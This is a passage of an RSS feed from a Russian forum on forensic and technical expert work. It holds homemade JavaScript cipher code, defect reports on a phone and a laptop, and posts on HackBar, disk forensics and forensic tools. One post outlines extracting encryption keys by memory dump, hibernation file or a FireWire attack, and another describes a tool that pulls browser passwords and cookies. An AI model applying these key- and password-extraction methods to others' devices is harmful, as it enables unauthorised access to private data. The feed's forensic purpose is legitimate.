    kA[7]*Math.sin(kB[7]*i+kC[7]);
    garmo=Math.round(Math.abs(garmo));
    garmo=garmo%65536;
    plu=st1.charCodeAt(i);
    plu=(plu+garmo)%65536;
    plu=IntToHex(plu,4);
    st2=st2+plu;//+&#039;,&#039;;
  }

  return st2;
}





function cipher6969(st1,passwo){

  var kA = new Array ();
  var st2=calcMD5(passwo);
  kA[0]=HexToInt(st2.substring( 0, 4));
  kA[1]=HexToInt(st2.substring( 4, 8));
  kA[2]=HexToInt(st2.substring( 8,12));
  kA[3]=HexToInt(st2.substring(12,16));
  kA[4]=HexToInt(st2.substring(16,20));
  kA[5]=HexToInt(st2.substring(20,24));
  kA[6]=HexToInt(st2.substring(24,28));
  kA[7]=HexToInt(st2.substring(28,32));  

  var kB = new Array (
    69691, 69697, 86969, 116969,
    169691, 169693, 296969, 356969);

  var st15=st1.toLowerCase();
  st15=st15.replace(/[^0-9a-f]/g,&#039;&#039;);
  var L15=st15.length;

  st2=&#039;&#039;;
  if((L15%4==0)&amp;amp;&amp;amp;(L15&amp;gt;32)){

    var he1=st15.substring(0,32);
    var kC = new Array ();
    kC[0]=HexToInt(he1.substring( 0, 4));
    kC[1]=HexToInt(he1.substring( 4, 8));
    kC[2]=HexToInt(he1.substring( 8,12));
    kC[3]=HexToInt(he1.substring(12,16));
    kC[4]=HexToInt(he1.substring(16,20));
    kC[5]=HexToInt(he1.substring(20,24));
    kC[6]=HexToInt(he1.substring(24,28));
    kC[7]=HexToInt(he1.substring(28,32));

    var plu=&#039;(c)arraylove.narod.ru,2013&#039;;
    var garmo=0;
    var t=0;
    for(var i=32;i&amp;lt;L15;i=i+4){
      garmo=
      kA[0]*Math.sin(kB[0]*t+kC[0])+
      kA[1]*Math.sin(kB[1]*t+kC[1])+
      kA[2]*Math.sin(kB[2]*t+kC[2])+
      kA[3]*Math.sin(kB[3]*t+kC[3])+
      kA[4]*Math.sin(kB[4]*t+kC[4])+
      kA[5]*Math.sin(kB[5]*t+kC[5])+
      kA[6]*Math.sin(kB[6]*t+kC[6])+
      kA[7]*Math.sin(kB[7]*t+kC[7]);
      t=t+1;
      garmo=Math.round(Math.abs(garmo));
      garmo=garmo%65536;
      plu=st15.substr(i,4);
      plu=HexToInt(plu);
      plu=(plu+65536-garmo)%65536;
      plu=String.fromCharCode(plu);
      st2=st2+plu;
    }

  }

  if(calcMD5(st2)!=he1){st2=&#039;&#039;;}

  return st2;
}


&amp;lt;/script&amp;gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;</description>
			<author>mybb@mybb.ru (matrix)</author>
			<pubDate>Wed, 25 Jun 2014 20:35:19 +0400</pubDate>
			<guid>http://expertiza.mybb.ru/viewtopic.php?pid=102#p102</guid>
		</item>
		<item>
			<title>HackBar — расширение Firefox для хакеров</title>
			<link>http://expertiza.mybb.ru/viewtopic.php?pid=100#p100</link>
			<description>&lt;p&gt;&lt;span style=&quot;font-size: 20px&quot;&gt;HackBar — расширение Firefox для хакеров&lt;/span&gt;&lt;br /&gt;Данная панель инструментов поможет вам в тестировании sql-инъекций, XSS «дырок» и общей безопасности сайта. Это расширение не инструмент для выполнения эксплойтов (от англ. — exploit) и оно не научит взламывать сайт (или стать хакером). Первостепенная роль расширения — помочь разработчикам в проверке степени безопасности их кода. Если вы знаете что вам требуется сделать, то эта панель поможет сделать это быстрее. Если вы только хотите научиться находить пробелы в безопасности, то вы также можете использовать эту панель, но вам потребуется как минимум книга и «много-много гугла».&lt;/p&gt;</description>
			<author>mybb@mybb.ru (counter)</author>
			<pubDate>Sun, 22 Jun 2014 05:36:27 +0400</pubDate>
			<guid>http://expertiza.mybb.ru/viewtopic.php?pid=100#p100</guid>
		</item>
		<item>
			<title>Федотов Н.Н. Форензика — компьютерная криминалистика</title>
			<link>http://expertiza.mybb.ru/viewtopic.php?pid=94#p94</link>
			<description>&lt;p&gt;&lt;a href=&quot;https://yandex.ru/yandsearch?text=%D0%A4%D0%B5%D0%B4%D0%BE%D1%82%D0%BE%D0%B2%20%D0%A4%D0%BE%D1%80%D0%B5%D0%BD%D0%B7%D0%B8%D0%BA%D0%B0%20%22%D0%9F%D1%80%D0%B0%D0%B2%D0%B8%D0%BB%D0%B0%20%D1%81%D0%B1%D0%BE%D1%80%D0%B0%20%D0%B8%20%D1%84%D0%B8%D0%BA%D1%81%D0%B0%D1%86%D0%B8%D0%B8%20%D1%86%D0%B8%D1%84%D1%80%D0%BE%D0%B2%D1%8B%D1%85%20%D0%B4%D0%BE%D0%BA%D0%B0%D0%B7%D0%B0%D1%82%D0%B5%D0%BB%D1%8C%D1%81%D1%82%D0%B2%20%28%D1%82%D0%BE%20%D0%B5%D1%81%D1%82%D1%8C%20%D0%BA%D0%BE%D0%BC%D0%BF%D1%8C%D1%8E%D1%82%D0%B5%D1%80%D0%BD%D0%BE%D0%B9%20%D0%B8%D0%BD%D1%84%D0%BE%D1%80%D0%BC%D0%B0%D1%86%D0%B8%D0%B8%2C%20%D0%B8%D1%81%D0%BF%D0%BE%D0%BB%D1%8C%D0%B7%D1%83%D0%B5%D0%BC%D0%BE%D0%B9%20%D0%B2%20%D0%BA%D0%B0%D1%87%D0%B5%D1%81%D1%82%D0%B2%D0%B5%20%D0%B4%D0%BE%D0%BA%D0%B0%D0%B7%D0%B0%D1%82%D0%B5%D0%BB%D1%8C%D1%81%D1%82%D0%B2%D0%B0%29%20%D0%BD%D0%B5%20%D0%B7%D0%B0%D0%BA%D1%80%D0%B5%D0%BF%D0%BB%D0%B5%D0%BD%D1%8B%20%D0%B2%20%D0%B7%D0%B0%D0%BA%D0%BE%D0%BD%D0%B5.%20%D0%9D%D0%B5%D1%82%20%D0%B8%20%D0%B2%D0%B5%D0%B4%D0%BE%D0%BC%D1%81%D1%82%D0%B2%D0%B5%D0%BD%D0%BD%D1%8B%D1%85%20%D0%BD%D0%BE%D1%80%D0%BC%D0%B0%D1%82%D0%B8%D0%B2%D0%BD%D1%8B%D1%85%20%D0%B0%D0%BA%D1%82%D0%BE%D0%B2%2C%20%D0%B7%D0%B0%D0%BA%D1%80%D0%B5%D0%BF%D0%BB%D1%8F%D1%8E%D1%89%D0%B8%D1%85%20%D1%82%D0%B0%D0%BA%D0%B8%D0%B5%20%D0%BF%D1%80%D0%B0%D0%B2%D0%B8%D0%BB%D0%B0.%22&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;Федотов Н.Н. Форензика — компьютерная криминалистика&lt;/a&gt;&lt;/p&gt;</description>
			<author>mybb@mybb.ru (counter)</author>
			<pubDate>Tue, 20 May 2014 13:46:28 +0400</pubDate>
			<guid>http://expertiza.mybb.ru/viewtopic.php?pid=94#p94</guid>
		</item>
		<item>
			<title>Разное</title>
			<link>http://expertiza.mybb.ru/viewtopic.php?pid=93#p93</link>
			<description>&lt;div class=&quot;quote-box answer-box&quot;&gt;&lt;cite&gt;Игорь Васильевич написал(а):&lt;/cite&gt;&lt;blockquote&gt;&lt;p&gt;иногда еще появлялся звук когда обновлял браузер, или переустанавливал его, сейчас никак&lt;/p&gt;&lt;/blockquote&gt;&lt;/div&gt;&lt;p&gt;1. Проверьте настройки громкости.&lt;br /&gt;2. Проверьте виндовые настройки звука. Возможно причина в неправильных системных настройках.&lt;br /&gt;3. Проверьте, включена ли служба воспроизведения звука (аудио).&lt;br /&gt;4. Включите воспроизведение музыки и плавно (без ударов!) потрясите ноутбук под разными углами наклона.&lt;/p&gt;</description>
			<author>mybb@mybb.ru (phucker)</author>
			<pubDate>Sun, 11 May 2014 20:40:14 +0400</pubDate>
			<guid>http://expertiza.mybb.ru/viewtopic.php?pid=93#p93</guid>
		</item>
		<item>
			<title>Экспертиза смартфона Highscreen Boost II яркое пятно на экране</title>
			<link>http://expertiza.mybb.ru/viewtopic.php?pid=88#p88</link>
			<description>&lt;p&gt;&lt;span style=&quot;font-size: 20px&quot;&gt;Highscreen Boost II&lt;/span&gt;&lt;/p&gt;
						&lt;p&gt;Неисправность: яркое пятно (засвет) на экране. Особенно заметно при полностью белом экране.&lt;/p&gt;
						&lt;p&gt;Случай 1&lt;br /&gt;highscreen boost 2 яркое пятно на экране&lt;br /&gt;появилось&amp;#160; пятно&amp;#160; в низу&amp;#160; экрана&amp;#160; ,особенно видно на белом фоне, оно немого&amp;#160; ярче&amp;#160; чем сам дисплей но при этом цвета передаются теже, что может быть?&lt;/p&gt;
						&lt;p&gt;Случай 2&lt;br /&gt;Отмечается такая проблема, как розовое пятно, оно слабо различимо и не всегда проявляется, но все-таки присутствие такого конструктивного недостатка нужно учитывать.&lt;/p&gt;
						&lt;p&gt;Можно с уверенностью утверждать, что данный недостаток смартфона относится не к случаям отдельного производственного брака, а является конструктивным недостатком всей линейки Highscreen Boost II&lt;/p&gt;</description>
			<author>mybb@mybb.ru (matrix)</author>
			<pubDate>Sun, 09 Mar 2014 14:33:52 +0400</pubDate>
			<guid>http://expertiza.mybb.ru/viewtopic.php?pid=88#p88</guid>
		</item>
		<item>
			<title>Ссылки</title>
			<link>http://expertiza.mybb.ru/viewtopic.php?pid=87#p87</link>
			<description>&lt;p&gt;&lt;a href=&quot;http://www.spy-soft.net/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.spy-soft.net/&lt;/a&gt;&lt;/p&gt;</description>
			<author>mybb@mybb.ru (counter)</author>
			<pubDate>Mon, 03 Mar 2014 21:34:04 +0400</pubDate>
			<guid>http://expertiza.mybb.ru/viewtopic.php?pid=87#p87</guid>
		</item>
		<item>
			<title>Криминалистический софт (soft, программы)</title>
			<link>http://expertiza.mybb.ru/viewtopic.php?pid=85#p85</link>
			<description>&lt;p&gt;&lt;span style=&quot;font-size: 20px&quot;&gt;Galleta&lt;/span&gt;&lt;/p&gt;
						&lt;p&gt;Galleta (Испанский — Печенье) — это профессиональный инструмент от компании MCafee, который используется специалистами Форензики, компьютерной криминалистики. Программа вытаскивает всю историю, кеш, пароли и кукисы браузера Internet Explorer. В некоторых благоприятных случаях копает глубже чем остальные похожие программы которые работают с Internet Explorer.&lt;br /&gt;Программа кроссплатформенная, работает на Mac OS, Linux и *BSD, Windows.&lt;/p&gt;</description>
			<author>mybb@mybb.ru (counter)</author>
			<pubDate>Mon, 03 Mar 2014 21:27:47 +0400</pubDate>
			<guid>http://expertiza.mybb.ru/viewtopic.php?pid=85#p85</guid>
		</item>
		<item>
			<title>Криминалистический анализ дисков</title>
			<link>http://expertiza.mybb.ru/viewtopic.php?pid=78#p78</link>
			<description>&lt;p&gt;&lt;span style=&quot;font-size: 20px&quot;&gt;Криминалистический анализ дисков&lt;/span&gt;&lt;/p&gt;
						&lt;p&gt;Криминалистический анализ: основные требования&lt;/p&gt;
						&lt;p&gt;Не секрет, что разработка тех или иных инструментов подчиняется требованиям заказчика. В случае с программами для восстановления данных – это восстановление максимального количества информации за минимальное время. А как обстоят дела в сфере криминалистики? Требования похожи и непохожи одновременно.&lt;/p&gt;
						&lt;p&gt;Работа в режиме «только чтение»&lt;/p&gt;
						&lt;p&gt;Работа в режиме «только для чтения» - одно из немногих требований, которое роднит две категории программ. Доступ только на чтение информации используется программами по восстановлению данных с целью не допустить повреждения или перезаписи удалённых файлов. А вот в криминалистике дела обстоят гораздо жёстче: требование неизменности извлекаемых улик – один из основополагающих принципов судопроизводства. Соответственно, криминалисты предпочитают не полагаться на добрую волю программистов, а подстраховываются, используя специальные аппаратные блокираторы записи. Использование таких устройств заведомо исключает любые попытки записи на исследуемый жёсткий диск.&lt;/p&gt;
						&lt;p&gt;Использование виртуальных образов диска&lt;/p&gt;
						&lt;p&gt;Использовать виртуальный образ диска или восстанавливать данные «по живому» - выбор каждого специалиста по восстановлению данных. У криминалистов такого выбора нет: стандартная процедура анализа диска подразумевает снятие образа в формате Ex01, DD или SMART, и последующий анализ этого образа. Практика, удобная со многих точек зрения, но требующая наличия свободного диска большого объёма.&lt;/p&gt;
						&lt;p&gt;Документирование процесса&lt;/p&gt;
						&lt;p&gt;Одна из обязанностей криминалиста – тщательное документирование каждого шага работы с цифровыми уликами. Все операции, проделанные аналитиком, должны быть прозрачны и повторяемы другим, независимым специалистом. Для программ по восстановлению данных таких требований не существует, поэтому создаваемые такими программами отчёты ограничиваются списком файлов, которые удалось или не удалось восстановить.&lt;/p&gt;
						&lt;p&gt;Поиск по сигнатурам и data carving&lt;/p&gt;
						&lt;p&gt;Программы для восстановления данных используют мощные алгоритмы для поиска файлов на всей поверхности жёсткого диска. Эти алгоритмы используют известные повторяющиеся участки (сигнатуры) для того, чтобы обнаружить начало файла. Последующий анализ заголовка файла позволяет вычислить его длину.&lt;/p&gt;
						&lt;p&gt;Недостаток таких алгоритмов – невозможность полностью восстановить фрагментированные файлы (разумеется, это касается только файлов, для которых нет соответствующей записи в файловой системе, а также дисков с повреждённой или уничтоженной файловой системой).&lt;/p&gt;
						&lt;p&gt;В условиях расследования преступлений часто требуется восстановить какой-то конкретный файл независимо от того, фрагментирован он или нет. В этом случае на помощь приходят алгоритмы семейства “data carving” (соответствующего термина на русском языке пока не существует). Такие алгоритмы используют эвристику, комбинаторику и львиную долю ручного труда для сборки интересующего криминалиста файла из множества отдельных фрагментов. Процесс этот чрезвычайно длительный и трудоёмкий, поэтому даже в криминалистике на сегодняшний день он используется очень и очень редко. Впрочем, разработчики не стоят на месте – и уже завтра может появиться программа, которая сможет автоматизировать процесс.&lt;/p&gt;
						&lt;p&gt;Что именно восстанавливается&lt;/p&gt;
						&lt;p&gt;Казалось бы, пользователей компьютера и криминалистов должны интересовать одни и те же файлы, но это не так. Криминалистов интересует поведение подозреваемого на протяжении некоего отрезка времени. Соответственно, извлекаются такие данные, как кэш браузера, база данных, содержащая историю посещённых веб-сайтов, файлы реестра Windows, а также базы данных истории программ мгновенного обмена сообщениями – Skype, ICQ и подобных. Также извлекаются фотографии и документы – пожалуй, программы восстановления данных и криминалистические инструменты солидарны только по этим двум пунктам.&lt;/p&gt;
						&lt;p&gt;Аналитика и отчёты&lt;/p&gt;
						&lt;p&gt;Работа программы восстановления данных заканчивается тогда, когда все извлечённые файлы успешно записаны на альтернативный носитель. А работа аналитика-криминалиста на этом только начинается. Теперь нужно проанализировать все найденные данные, просмотреть записи в базах данных, проанализировать действия и составить психологический портрет преступника. Именно эта часть занимает большую часть времени криминалиста, и разработчики соответствующих программ не подкачали: аналитическая часть самых популярных пакетов (Guidance EnCase, AccessData FTK, Belkasoft Evidence Center, Oxygen Forensic Toolkit и многих других) превосходит воображение.&lt;/p&gt;
						&lt;p&gt;А потом наступает время составления отчёта. Криминалистические программы предоставляют для этого массу встроенных возможностей, позволяя создавать практически любые отчёты, от кратких до очень подробных.&lt;/p&gt;
						&lt;p&gt;Заключение&lt;/p&gt;
						&lt;p&gt;Как мы увидели, криминалистические программы используют в своей работе многие из тех алгоритмов, которые были разработаны для восстановления данных. Но там, где труд специалиста по восстановлению данных заканчивается, работа криминалиста только начинается. Для этого и существует масса аналитических пакетов соответствующего назначения. А нужды простых пользователей с лихвой покрывают самые обычные программы по восстановлению данных.&lt;/p&gt;</description>
			<author>mybb@mybb.ru (counter)</author>
			<pubDate>Mon, 03 Mar 2014 21:08:41 +0400</pubDate>
			<guid>http://expertiza.mybb.ru/viewtopic.php?pid=78#p78</guid>
		</item>
		<item>
			<title>Шифрование диска - головная боль компьютерного эксперта</title>
			<link>http://expertiza.mybb.ru/viewtopic.php?pid=77#p77</link>
			<description>&lt;p&gt;Компания «Элкомсофт» выпустила программу &lt;strong&gt;Elcomsoft Forensic Disk Decryptor&lt;/strong&gt;, которая предназначена для криминалистической экспертизы криптоконтейнеров &lt;strong&gt;BitLocker&lt;/strong&gt;, &lt;strong&gt;PGP&lt;/strong&gt; и &lt;strong&gt;TrueCrypt&lt;/strong&gt;. Поддерживаются как фиксированные, так и портативные носители, включая &lt;strong&gt;PGP&lt;/strong&gt; в режиме шифрования всего диска, а также съёмные диски, защищённые с помощью &lt;strong&gt;BitLocker To Go&lt;/strong&gt;. С помощью &lt;strong&gt;Elcomsoft Forensic Disk Decryptor&lt;/strong&gt; можно как полностью расшифровать содержимое защищённого тома, так и работать в реальном времени с подключением зашифрованных томов и расшифровкой выбранных данных «на лету».&lt;/p&gt;
						&lt;p&gt;Программа извлекает ключи шифрования тремя методами:&lt;/p&gt;
						&lt;p&gt;1. Из дампа оперативной памяти. Все ключи извлекаются единовременно, даже если в системе присутствуют более, чем один криптоконтейнер. Дамп оперативной памяти может быть создан с помощью соответствующих криминалистических продуктов, например, &lt;strong&gt;MoonSols Windows Memory Toolkit&lt;/strong&gt;. Зашифрованные тома в момент снятия слепка должны быть подключены; в противном случае ключ расшифровки извлечь не удастся. Подробное описание этой технологии (и полный список коммерческих и бесплатных программ см. здесь.&lt;/p&gt;
						&lt;p&gt;2. Анализ файла гибернации (исследуемый компьютер выключен). Защищённые тома должны быть подключены перед выключением компьютера. Если криптоконтейнер был размонтирован перед созданием файла гибернации, извлечь из него ключи будет невозможно.&lt;/p&gt;
						&lt;p&gt;3. Атакой через порт FireWire, если у вас не хватает прав для снятия дампа памяти или запуска программ на анализируемом компьютере. Для проведения атаки через порт FireWire требуется дополнительный компьютер с установленным бесплатным продуктом (например, &lt;strong&gt;Inception&lt;/strong&gt;). Такая атака даёт практически стопроцентный результат, но опять же, зашифрованные тома должны быть подключены в момент анализа.&lt;/p&gt;
						&lt;p&gt;Если удалось извлечь ключи шифрования, то с их помощью расшифровка информации на носителе осуществляется в реальном времени — практически мгновенно.&lt;/p&gt;</description>
			<author>mybb@mybb.ru (counter)</author>
			<pubDate>Mon, 03 Mar 2014 21:02:30 +0400</pubDate>
			<guid>http://expertiza.mybb.ru/viewtopic.php?pid=77#p77</guid>
		</item>
		<item>
			<title>Экспертиза мобильного телефона Nokia N900 black</title>
			<link>http://expertiza.mybb.ru/viewtopic.php?pid=75#p75</link>
			<description>&lt;p&gt;&lt;img class=&quot;postimg&quot; loading=&quot;lazy&quot; src=&quot;http://s9.uploads.ru/vYZF0.jpg&quot; alt=&quot;http://s9.uploads.ru/vYZF0.jpg&quot; /&gt;&lt;/p&gt;
						&lt;p&gt;&lt;img class=&quot;postimg&quot; loading=&quot;lazy&quot; src=&quot;http://s9.uploads.ru/94Eol.jpg&quot; alt=&quot;http://s9.uploads.ru/94Eol.jpg&quot; /&gt;&lt;/p&gt;
						&lt;p&gt;При экспертизе мобильного телефона установлено:&lt;/p&gt;
						&lt;p&gt;Повреждения от значительных внешних механических воздействий: сколы, трещины, вмятины на поверхностях устройства - не просматриваются;&lt;br /&gt;Внешним осмотром не обнаружены какие-либо следы химических, термических и других воздействий или внешних признаков нарушения правил эксплуатации изделия;&lt;br /&gt;Следы попадания жидкости и загрязнений не просматриваются;&lt;br /&gt;Мобильный телефон тестировался с помощью исправных сим-карты «Билайн» sim: 897019910070532211, сим-карты «МТС» sim: 8970101006003716506, сим-карты «Мегафон» sim: 8970126585408427 в зоне уверенного приема всех вышеперечисленных операторов, с исправной оригинальной аккумуляторной батареей;&lt;br /&gt;При подключении заведомо исправной оригинальной аккумуляторной батареи, возникает вибрация аппарата, появляется надпись NOKIA на фоне тусклого экрана, затем изображение пропадает и через некоторое время самопроизвольно вновь появляется.&lt;br /&gt;После нажатия клавиши включения, полного включения аппарата не происходит.&lt;br /&gt;При подключении зарядного устройства или USB-кабеля, после нажатия клавиши включения, происходит полное включение аппарата, загружается программное обеспечение, появляется рабочий стол.&lt;br /&gt;Имеющийся IMEI в системе совпадает с указанным на шильдике (на корпусе под аккумуляторной батареей).&lt;br /&gt;После прошивки/прошивки флеш-памяти аппарата, дефект устранен не был, сбой ПО (программного обеспечения) исключен.&lt;br /&gt; &lt;/p&gt;
						&lt;p&gt;После вскрытия устройства с соблюдением правил, указанных в сервисной Инструкции обнаружено:&lt;/p&gt;
						&lt;p&gt;Попадания жидкости на системную плату и установленных на ней компонентов не выявлено;&lt;br /&gt;Указанное место сервисным центром (стр. 75 судебного дела № 2-XXX/11) следов коррозии и попадания жидкости не имеет;&lt;br /&gt;Кнопка включения имеет следы ремонта, ширина галтели припоя сильно отличается от заводской пайки других кнопок управления.&lt;/p&gt;</description>
			<author>mybb@mybb.ru (Владимир Ильич)</author>
			<pubDate>Sat, 22 Feb 2014 18:41:32 +0400</pubDate>
			<guid>http://expertiza.mybb.ru/viewtopic.php?pid=75#p75</guid>
		</item>
		<item>
			<title>Экспертиза ноутбука Lenovo SL500</title>
			<link>http://expertiza.mybb.ru/viewtopic.php?pid=73#p73</link>
			<description>&lt;p&gt;&lt;img class=&quot;postimg&quot; loading=&quot;lazy&quot; src=&quot;http://s9.uploads.ru/jIpcy.jpg&quot; alt=&quot;http://s9.uploads.ru/jIpcy.jpg&quot; /&gt;&lt;/p&gt;
						&lt;p&gt;&lt;img class=&quot;postimg&quot; loading=&quot;lazy&quot; src=&quot;http://s9.uploads.ru/ifbDz.jpg&quot; alt=&quot;http://s9.uploads.ru/ifbDz.jpg&quot; /&gt;&lt;/p&gt;
						&lt;p&gt;При экспертизе ноутбука установлено:&lt;/p&gt;
						&lt;p&gt;Шлицы крепежных элементов имеют повреждения;&lt;br /&gt;Имеется механическое повреждение в районе левого поворотного узла крепления верхней крышки ноутбука;&lt;br /&gt;При поднятии верхней крышки (открытии) происходит “выламывание” верхней крышки нижней части корпуса;&lt;/p&gt;
						&lt;p&gt;После вскрытия устройства с соблюдением правил, указанных в сервисной Инструкции обнаружено:&lt;/p&gt;
						&lt;p&gt;Имеются следы неквалифицированного ремонта;&lt;br /&gt;У основания левого узла крепления корпуса матрицы имеется дефект в виде нарушения целостности;&lt;br /&gt;Отсутствует резиновая прокладка, левого узла крепления верхней крышки, направляющая провода от матрицы к системной плате;&lt;br /&gt;Попадание изоляционной обмотки проводов в левый узел крепления привело к его “заклиниванию” и нарушению целостности основания, отделившаяся часть оказывает механическое воздействие на верхнюю крышку нижней части корпуса;&lt;br /&gt;Имеющаяся резиновая прокладка в правом узле крепления верхней крышки.&lt;br /&gt; &lt;/p&gt;
						&lt;p&gt;Отсутствие резиновой прокладки левого поворотного узла верхней крышки привело к попаданию изоляционной обмотки проводов в пазы крепления, что в дальнейшем вызвало деформацию основания крепления, отсоединившаяся часть которого, при открытии ноутбука, оказывает механическое воздействие на верхнюю крышку нижней части корпуса.&lt;/p&gt;</description>
			<author>mybb@mybb.ru (Владимир Ильич)</author>
			<pubDate>Sat, 22 Feb 2014 18:37:09 +0400</pubDate>
			<guid>http://expertiza.mybb.ru/viewtopic.php?pid=73#p73</guid>
		</item>
	</channel>
</rss>
